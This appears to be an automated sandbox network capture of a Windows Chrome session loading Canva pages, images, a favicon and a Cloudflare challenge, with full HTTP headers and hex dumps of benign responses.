                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1188INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:45 GMT
                                                                                                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                    Content-Length: 368
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59513029844402-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 1055338
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "0483f2b648dcc986d01385062052ae1c"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:31 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Thu, 22 Aug 2024 01:18:08 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Sat, 23 Aug 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: xeTx9lA9amwqbH5jjDVeVXloY7Ex6jZEUcXdx9yDq3h/7bU2UJe8XkXADOF2ZvoF0qVNGdnR+dg=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: FSG4RK5H2Q8YM4X8
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: AhYdWN.s3rGHhicTCPUHIrYI2qLxhFbr
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC352INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 66 55 73 33 4c 4a 51 4b 4e 73 25 32 42 7a 48 65 25 32 46 45 4c 74 70 6d 31 65 66 72 25 32 42 4e 50 37 4b 75 77 65 57 59 66 50 66 71 4d 66 54 4f 41 4e 75 49 34 4b 65 79 53 34 6a 41 30 42 42 64 68 35 45 6e 41 74 62 4e 34 77 66 4a 4b 45 6f 58 72 6c 55 70 58 32 38 33 58 43 75 36 56 4b 48 37 47 74 52 73 78 6b 44 51 39 30 46 72 31 56 4b 71 53 72 62 6e 64 76 34 33 61 37 5a 25 32 46 50 33 64 31 65 72 73 7a 6a 41 4c 70 59 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fUs3LJQKNs%2BzHe%2FELtpm1efr%2BNP7KuweWYfPfqMfTOANuI4KeyS4jA0BBdh5EnAtbN4wfJKEoXrlUpX283XCu6VKH7GtRsxkDQ90Fr1VKqSrbndv43a7Z%2FP3d1erszjALpY%3D"}],"group":"cf-nel","max_age":6048
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC368INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 33 36 20 33 36 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 44 44 32 45 34 34 22 20 64 3d 22 4d 33 35 2e 38 38 35 20 31 31 2e 38 33 33 63 30 2d 35 2e 34 35 2d 34 2e 34 31 38 2d 39 2e 38 36 38 2d 39 2e 38 36 37 2d 39 2e 38 36 38 2d 33 2e 33 30 38 20 30 2d 36 2e 32 32 37 20 31 2e 36 33 33 2d 38 2e 30 31 38 20 34 2e 31 32 39 2d 31 2e 37 39 31 2d 32 2e 34 39 36 2d 34 2e 37 31 2d 34 2e 31 32 39 2d 38 2e 30 31 37 2d 34 2e 31 32 39 2d 35 2e 34 35 20 30 2d 39 2e 38 36 38 20 34 2e 34 31 37 2d 39 2e 38 36 38 20 39 2e 38 36 38 20 30 20 2e 37 37 32 2e 30 39 38 20 31 2e 35 32 2e 32 36 36 20 32 2e 32 34 31 43 31
                                                                                                                                                                                                                                                                    Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 36 36"><path fill="#DD2E44" d="M35.885 11.833c0-5.45-4.418-9.868-9.867-9.868-3.308 0-6.227 1.633-8.018 4.129-1.791-2.496-4.71-4.129-8.017-4.129-5.45 0-9.868 4.417-9.868 9.868 0 .772.098 1.52.266 2.241C1


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    86192.168.2.1249809104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1505OUTPOST /cdn-cgi/challenge-platform/h/b/jsd/r/8e5950c0ed99c334 HTTP/1.1
                                                                                                                                                                                                                                                                    Host: www.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    Content-Length: 15943
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; ASI=01JD51FV1VGM6BED24P74ETQK2
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC15943OUTData Raw: 7b 22 77 70 22 3a 22 61 58 75 6a 44 76 4d 43 44 2b 75 44 31 73 6d 4d 55 4d 39 74 6f 6a 76 57 74 32 4e 74 41 48 41 34 34 76 43 4d 65 6c 74 63 2d 57 4a 2d 62 75 74 59 63 33 71 6d 2d 2b 4d 64 74 31 55 75 51 70 58 58 74 32 6b 34 74 68 74 34 57 34 75 4d 74 77 34 4d 30 6d 78 6a 6b 2b 58 45 66 42 6a 63 2d 4c 58 4e 32 37 64 39 73 51 56 6a 30 4c 44 5a 4e 79 4d 37 6c 63 6b 41 74 44 75 75 38 41 59 76 45 70 74 69 51 70 62 4f 45 74 4f 6a 73 59 74 76 5a 75 74 41 6a 76 76 6a 4c 31 6a 41 74 4d 2d 74 6f 2b 36 74 4d 79 45 74 67 4b 43 32 51 58 33 4d 32 6b 70 75 74 76 4b 45 74 76 6d 71 6f 74 71 76 74 4d 45 77 62 47 75 42 64 4e 57 76 51 76 4d 4f 30 4e 58 6c 44 4c 53 24 4f 63 74 48 6a 76 41 6e 52 58 74 43 36 58 2d 73 62 63 72 77 51 74 71 24 4f 6b 4c 48 32 6a 74 47 6b 48 62 41
                                                                                                                                                                                                                                                                    Data Ascii: {"wp":"aXujDvMCD+uD1smMUM9tojvWt2NtAHA44vCMeltc-WJ-butYc3qm-+Mdt1UuQpXXt2k4tht4W4uMtw4M0mxjk+XEfBjc-LXN27d9sQVj0LDZNyM7lckAtDuu8AYvEptiQpbOEtOjsYtvZutAjvvjL1jAtM-to+6tMyEtgKC2QX3M2kputvKEtvmqotqvtMEwbGuBdNWvQvMO0NXlDLS$OctHjvAnRXtC6X-sbcrwQtq$OkLH2jtGkHbA
                                                                                                                                                                                                                                                                    2024-11-20 15:01:45 UTC1353INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:45 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    Set-Cookie: cf_clearance=; Path=/; Expires=Thu, 01-Jan-70 00:00:00 GMT; Domain=.canva.com; Priority=High; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                    Set-Cookie: cf_clearance=f7lju1RE1zdHiOCQL4i18liElZUAlfkVsP6AsyiJ9gk-1732114905-1.2.1.1-6UtwQ4hKGzF5NKxEfI9x5H88_Or4i7.rSV90jNTTLP87mMsuweOxf9DCO7S4n8Mh2iJJF9L5oIl_T_5Dx8gg4KoK9920foRVgkHwJQGftplwcLSoQDZfMfTIca8xp0dpsUJ9zfE0iLU70u4qgItL3UQgK1OsjsDSOLVtMFAUeTxp6tNbNlj_bzERU3hJsxAjxUcowpiF2NDp_.Wng209KNIlFsiCXNpusKjI9AF.xU.W9xNnzKrh.rCkOUQoNawmY4l7lOyfL_.UyhI_tB0ABRq6aO2FugZB72yAs_jk3sc0i8YRldipRimJJbxLPGEmDaFRtMnDyG_EpzNkkYrM.q82jCjLZrLTVnVRW.z5Qb2x6aOIKUUgi.CXD3zqOT20; Path=/; Expires=Thu, 20-Nov-25 15:01:45 GMT; Domain=.canva.com; Priority=High; HttpOnly; Secure; SameSite=None; Partitioned
                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0Ln8flguEGTPAcU2%2BP8lG%2Bf1fj9q4HWoG2hriINyVN58%2Bjau5a3j3wsvhxTSrBkTQXmDHN7Qk8tQPkLs1YwQ5MzAvi4U5NGRd0a1WLxLC9Q8n5n0QRFgUoBnhhMb4Ks%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                    CF-RAY: 8e59512facb3436f-EWR


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    87192.168.2.1249817104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:46 UTC619OUTGET /static/images/favicon-1.ico HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:47 UTC1363INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:47 GMT
                                                                                                                                                                                                                                                                    Content-Type: image/vnd.microsoft.icon
                                                                                                                                                                                                                                                                    Content-Length: 4414
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59513a3d5c0f9c-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 804785
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "a0c86da7fc37ea50e848c4733761d53e"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:33 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Thu, 26 Sep 2024 23:42:56 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-id-2: qmu3uJIrITcBkPZN3RSh6KNHzdpLU8UCmnheU/729R4Vqvv6b0vAIElprWUjy17EBzhwaUtlF5dAgmBSrNX8MJi3cY706Gq5
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: QHY2G6YRGMK0V2M3
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: REYKMVSvn4pQBvQM7t126sw17ADi9h4U
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xyZ6%2BlNOyrLfL6bFQzmo8TEZhIdRcu5XPpzxqUJM8dRhDwoU70jJB4V73CmzZ2e3Ljovn7vTpa5aj8OdQdkd7XBojk%2FXPKaDcFOxNRM%2BBT3PeTgGOt78YB6DCqYYd1%2FDP4g%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    2024-11-20 15:01:47 UTC92INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2e 30 31 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                                                                                                                                                                                                                    2024-11-20 15:01:47 UTC1369INData Raw: 00 00 01 00 01 00 20 20 00 00 01 00 20 00 28 11 00 00 16 00 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 20 00 00 00 00 00 00 10 00 00 13 0b 00 00 13 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 00 01 ff 40 80 04 00 00 00 00 00 00 00 00 f3 23 68 16 f9 21 67 5c fc 22 68 9d fa 21 69 c9 f8 23 6b e3 f7 24 6c fb f6 24 6e fb f5 24 6f e3 f2 25 71 c9 f2 25 72 9d f1 27 73 5b e8 23 74 16 00 00 00 00 00 00 00 00 ff 40 80 04 ff 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 55 55 03 00 00 00 00 00 00 00 00 f9 2c 5d 29 fa 2b 5f 9f fb 29 62 f2 ff 2a 6a ff ff 29 6c ff ff 27 6c ff ff 25 6c ff f8 24 6b ff f7
                                                                                                                                                                                                                                                                    Data Ascii: (( @ @#h!g\"h!i#k$l$n$o%q%r's[#t@UU,])+_)b*j)l'l%l$k
                                                                                                                                                                                                                                                                    2024-11-20 15:01:47 UTC1369INData Raw: ff e4 5f 00 ff f8 e2 dc ff ff ff ff ff ff ff ff ff fa e7 e4 ff e5 58 00 ff e7 6d 45 ff e7 69 3e ff e6 67 3c ff e6 67 3d ff e5 66 3f ff e5 6a 48 ff e5 67 48 ff e1 35 00 ff f7 dd db ff fa ea ea ff e0 3e 27 ff e2 5b 59 ff e3 51 59 ff e3 4c 5f ff e3 46 64 ff e4 40 6a fe e7 3a 72 ff e6 35 75 f2 dc 2e 74 16 e0 81 2d 5b ed 89 30 ff de 80 2d fb e0 7f 2d ff e0 7d 2e ff e1 7d 33 ff e1 75 16 ff e5 8b 5e ff fe fa f9 ff ff fe fe ff ff ff ff ff ef b9 a9 ff e2 5d 00 ff e5 75 41 ff e4 6f 36 ff e4 6f 38 ff e4 6e 39 ff e3 6d 3a ff e3 6c 3b ff e3 6d 43 ff e2 66 3a ff e2 6b 4a ff fd f7 f6 ff e8 9a 90 ff df 4a 30 ff e1 5d 58 ff e1 54 59 ff e2 4e 5e ff e2 48 64 ff e3 42 6a fb f3 3e 77 ff e6 38 73 5b db 8a 29 9d ea 92 2b ff db 88 28 fb dc 87 28 ff dd 86 28 ff de 87 34 ff dd 78
                                                                                                                                                                                                                                                                    Data Ascii: _XmEi>g<g=f?jHgH5>'[YQYL_Fd@j:r5u.t-[0--}.}3u^]uAo6o8n9m:l;mCf:kJJ0]XTYN^HdBj>w8s[)+(((4x
                                                                                                                                                                                                                                                                    2024-11-20 15:01:47 UTC1369INData Raw: d8 7a 3c fb e8 7a 46 ff db 6f 45 5c d1 ae 0c 16 d0 b3 0e f2 d1 b7 0c ff cf b7 0a fe ce b8 09 ff ce b9 08 ff ce ba 05 ff cf bc 26 ff c9 b5 00 ff e6 de b3 ff ff ff ff ff ff ff ff ff f5 f1 e2 ff cc b4 00 ff cf b7 20 ff cf b4 16 ff cf b1 0d ff d0 af 0f ff d1 ae 28 ff ce a2 00 ff f1 e7 d6 ff ff ff ff ff f8 f3 ec ff d3 9d 1d ff d3 98 23 ff d4 94 29 ff d5 8f 2c ff d6 89 30 ff d7 85 34 fe da 7f 3a ff d9 78 3e f2 dc 74 46 16 00 00 00 00 cf b5 0b 9f dd c3 0b ff ce b9 09 fa ce ba 08 ff ce bb 07 ff cd bc 07 ff cd bd 0a ff cd be 12 ff cb bb 00 ff f3 f0 de ff ff ff ff ff ff ff ff ff e8 e1 bb ff c8 b1 00 ff cf b9 22 ff cf b7 27 ff cf b4 19 ff d1 b4 32 ff cc a7 00 ff ec e1 c6 ff ff ff ff ff fb f9 f4 ff d5 a9 4d ff d2 9a 00 ff d4 98 29 ff d4 92 28 ff d5 8d 2d ff d6 89 31
                                                                                                                                                                                                                                                                    Data Ascii: z<zFoE\& (#),04:x>tF"'2M)(-1
                                                                                                                                                                                                                                                                    2024-11-20 15:01:47 UTC307INData Raw: b9 0a 9d cd b4 0b 5c d1 ae 0c 16 00 00 00 00 00 00 00 00 ff bf 00 04 ff ff 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                    Data Ascii: \


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    88192.168.2.1249815104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:46 UTC639OUTGET /web/images/9abc2241bf1479263a0a039f3d1e5b5c.svg HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:47 UTC1219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:47 GMT
                                                                                                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                    Content-Length: 2312
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59513a3eb35e76-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 59289
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "9abc2241bf1479263a0a039f3d1e5b5c"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:33 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 09 Oct 2024 00:47:36 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 10 Oct 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: l/jaYL1CviTcpi7IWVApay5evvQjiyTF0qGASq10lAlLjKqPJwUIPFOx/HpRvyXWnQCevqxqMj0p6mGu3pKr7MmJ7cobB3atMJ+YiNfcAbc=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: 0HNPB33TD9TRGMXH
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: 5JBm5P5CmruT2rPkvXmLOGpjKegm8Zvj
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:47 UTC348INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 68 6b 39 62 31 63 7a 64 75 46 4c 78 79 58 74 71 4c 68 51 72 34 68 66 77 56 6d 46 74 67 36 56 4a 52 58 31 52 79 33 63 50 74 54 76 67 36 25 32 46 52 79 4c 6c 36 79 48 74 53 78 59 5a 78 52 66 53 6a 54 68 38 4f 37 78 58 6d 62 7a 6f 53 78 6e 35 6a 35 41 68 43 53 78 62 62 63 42 67 4c 4c 35 43 31 53 43 73 30 25 32 46 71 6e 46 41 44 75 67 39 63 78 51 78 34 61 68 48 75 4e 77 38 4f 79 47 46 42 74 6c 42 75 52 34 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hk9b1czduFLxyXtqLhQr4hfwVmFtg6VJRX1Ry3cPtTvg6%2FRyLl6yHtSxYZxRfSjTh8O7xXmbzoSxn5j5AhCSxbbcBgLL5C1SCs0%2FqnFADug9cxQx4ahHuNw8OyGFBtlBuR4%3D"}],"group":"cf-nel","max_age":604800}
